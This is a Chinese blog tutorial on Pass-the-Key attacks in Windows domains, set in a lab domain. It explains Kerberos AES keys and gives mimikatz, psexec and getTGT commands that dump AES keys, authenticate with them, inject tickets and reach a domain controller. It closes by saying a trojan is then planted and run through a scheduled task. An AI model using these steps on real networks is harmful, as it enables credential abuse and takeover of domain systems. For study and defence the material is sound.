PTK密钥传递攻击

最新推荐文章于 2024-06-13 09:54:29 发布
最新推荐文章于 2024-06-13 09:54:29 发布
阅读量634 收藏 11
点赞数 6
分类专栏: 内网篇 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/139167722
版权

一. PTK密钥传递攻击原理

1. PTK介绍

PTK(Pass The key),中文叫密钥传递攻击,PTH传递中,使用的是NTLM-HASH值,PTK使用
AES256或者AES128的方式进行传递,PTK 攻击只能用于kerberos认证中,NTLM认证中没有!

2.PTK的原理-kerberos认证

AS-REQ(AS-requests):主要包含了用户的一些信息,是由客户端发送给AS的数据包。里面有几个
重要信息:

1、 PA-DATA pA-ENC-TIMESTAMP 使用用户的hash,或者AES key加密时间戳 生成value
PA-DATA pA-PAC-REQUEST,是否包含了PAC
2、 kdc-options 协商字段
3、 cname 请求的用户名
5、 realm: 域名
6、 sname 请求的服务

3.AES KEY 到底是是什么

AES KEY 是kerberos协议中使用的,所以一般域用户才有AES KEY,AES分为两种 aes256和
aes128,本地用户没有aes key
命令:“privilege::debug” “sekurlsa::ekeys”

server2008(加入域)
在这里插入图片描述
server 2008(未加入域)
在这里插入图片描述

二. PTK的利用条件

根据上面原理的描述,那么进行PTK传递认证的条件有什么

必须是域环境,使用域账号才可以进行PTK
支持aes进行认证
1.KB2871997补丁介绍

Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server2012也可以更新该补丁后获得上述安全保护机制。

介绍增强的安全保护机制中有如下部分几点:
减少存储在内存中的凭据数据
支持现代身份验证(Kerberos AES)

https://blog.csdn.net/Ping_Pig/article/details/109171690

在这里插入图片描述

2.PTK攻击

mimikatz进行传递

命令:sekurlsa::pth /user:用户名 /domain:域名或者IP /aes256:aeskey
sekurlsa::pth /user:administrator /domain:DC.hack.com /aes256:e7f05284c76ba55a21d1085d08142514b6fcc71be4c0e8b4164a8adc8c735927

在这里插入图片描述
抓包分析一下
在这里插入图片描述
这里出现的问题是因为使用mimikatz走的是NTLM挑战响应协议,这里需要换工具测试

psexec进行传递

命令:psexec.exe hack.com/administrator@dc.hack.com -aesKey e7f05284c76ba55a21d1085d08142514b6fcc71be4c0e8b4164a8adc8c735927

在这里插入图片描述
抓包分析
在这里插入图片描述
这里可以看到走的是kerberos认证协议并且是用aes256
在这里插入图片描述
与多台机器进行传递攻击

server 2008(one-pc)
在这里插入图片描述
win 10(three-pc)
在这里插入图片描述

三. 使用PTK进行上线CS

PTK本质上也是一种认证,本身不具有攻击性,如果是一些特殊账号的KEY被我们知道利用PTK传
递攻击,我们可以生成对应账号的TGT票据,然后将票据导入到内存中,就可以访问对方的电脑

可以使用 getTGT工具申请TGT,然后将TGT导入内存中,实现对目标机器的访问,后续可以配合
计划任务,或者其他的工具进行上线

第一步、生成TGT
可以生成TGT的工具有很多,比如kekeo Rubeus getTGT PS脚本等等,我么使用getTGT

getTGT.exe hack.com/administrator -aesKey e7f05284c76ba55a21d1085d08142514b6fcc71be4c0e8b4164a8adc8c735927

执行完成之后会在当前的目录下生成一个TGT票据,不过后缀是ccache(高速缓存票据)
在这里插入图片描述
在这里插入图片描述

第二步、将TGT注入到内存
工具有很多,比如kekeo Rubeus getTGT PS,mimikatz 等等,我们使用mimikatz

Kerberos::ptc 票据名字

执行完成之后会在当前的目录下生成一个TGT票据,不过后缀是ccache(凭证高速缓存)
在这里插入图片描述

第三步:访问DC的C盘

在这里插入图片描述
接下来就是copy木马到DC上,再通过创建计划任务或者是服务运行木马使目标机上线!

Y22Lee
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(三十八)之横向移动篇-pass the key 传递攻击(PTK)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 702
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK传递
战神/calmness的博客
10-01 851
目录 PTH(pass-the-hash) Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) ms14-068 Golden ticket (黄金票据) silver ticket (白银票据) PTK (pass the key) ​​​​​​​ PTH(pass-the-hash) 描述 pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .
内网横向移动—PTH哈希&PTT票据&PTK匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1294
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入码之后,码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文码!
Pass the key传递攻击PTK)横移
qq_64787896的博客
03-25 184
会弹出一个cmd命令框,这时可以直接输入dir \\PC2012.DAMN.com\C$查看Win2012C盘的共享文件夹。3.WIn2008开启mimikatz_x64.exe,输入sekurlsa::ekeys,查看aes256。(本来是有Win2012的aes256号的,Win2008由于版本原因看不到)2.Win2012域管账号远程Win2008的域账号,留下ticket。1.Win2012登陆域管账号,Win2008登陆本地账号。sekurlsa::ekeys //查看aes256。
干货 | WiFi无线渗透测试总结
2301_76161259的博客
07-04 993
1.WPA2:是WPA的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了PSK(预共享模式)秘,加强了WPA的不足之处,但是因为使用了PSK,所以只要攻击者知晓目标的PSK秘,就能十分轻易加入无线网络。2.WPA3:是近几年新出现的无线网络安全保护系统,在WPA2的基础上实现了针对字典法暴力码破解的难度,如果失败次数过多,AP将直接锁定攻击行为,以及取代了PSK使用对等实体验证(SAE)3.AP:特指无线网络接入点,就是路由器等设备的广泛称呼。
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
PTK9.py
05-11
PTK9.py
ptk888
02-12
关于Laravel Laravel是一个具有表达力,优雅语法的Web应用程序框架。 我们认为,发展必须是一种令人愉悦的创造力,才能真正实现。 Laravel通过减轻许多Web项目中使用的常见任务来减轻开发工作的痛苦,例如: ...
PTK20.py111111111
06-03
PTK20.py111111111
PTK19.py1111111111111
06-02
PTK19.py1111111111111
哈希传递PTH、传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1349
哈希传递PTH、传递PTT、票据传递PTK的实现和比较
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4619
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
Kali linux 学习笔记(三十一)无线渗透——交换(PTK)2020.3.11
闵行小鱼塘
03-11 803
简单讲述交换过程
SonarQube安全扫描常见问题
帅小缙的大脑风暴❤
06-11 479
SonarQube质量配置之扫描常见问题与问题修复
振弦采集仪在隧道工程中的安全监测与控制研究
最新发布
duxi222333的博客
06-13 500
通过安装振弦传感器,可以实时监测地下水位的变化情况,并采取相应的措施来保证隧道的安全。通过安装振弦传感器,可以实时监测地层的变形情况,并采取相应的措施来保证隧道的安全。同时,振弦采集仪也可以用于隧道施工期间的地层补偿控制,以减少地层的变形对施工的影响。总结,隧道工程的安全监测与控制是非常重要的工作,而振弦采集仪作为一种高精度和灵敏度的仪器,可以有效地监测和控制隧道工程中的地层变形、地下水位变化和地震影响等情况。振弦采集仪具有高精度和灵敏度的特点,能够对隧道工程中发生的微小变形进行准确的监测和控制。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 980
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1169
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
wifi接入过程中的PTK
05-05
PTK(Pairwise Transient Key)是在Wi-Fi接入过程中生成的一种临时,用于保护通信过程中的数据加和完整性校验。它是在四次握手过程中生成的,用于建立双方之间的安全通信。 PTK的生成过程需要使用到以下几个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值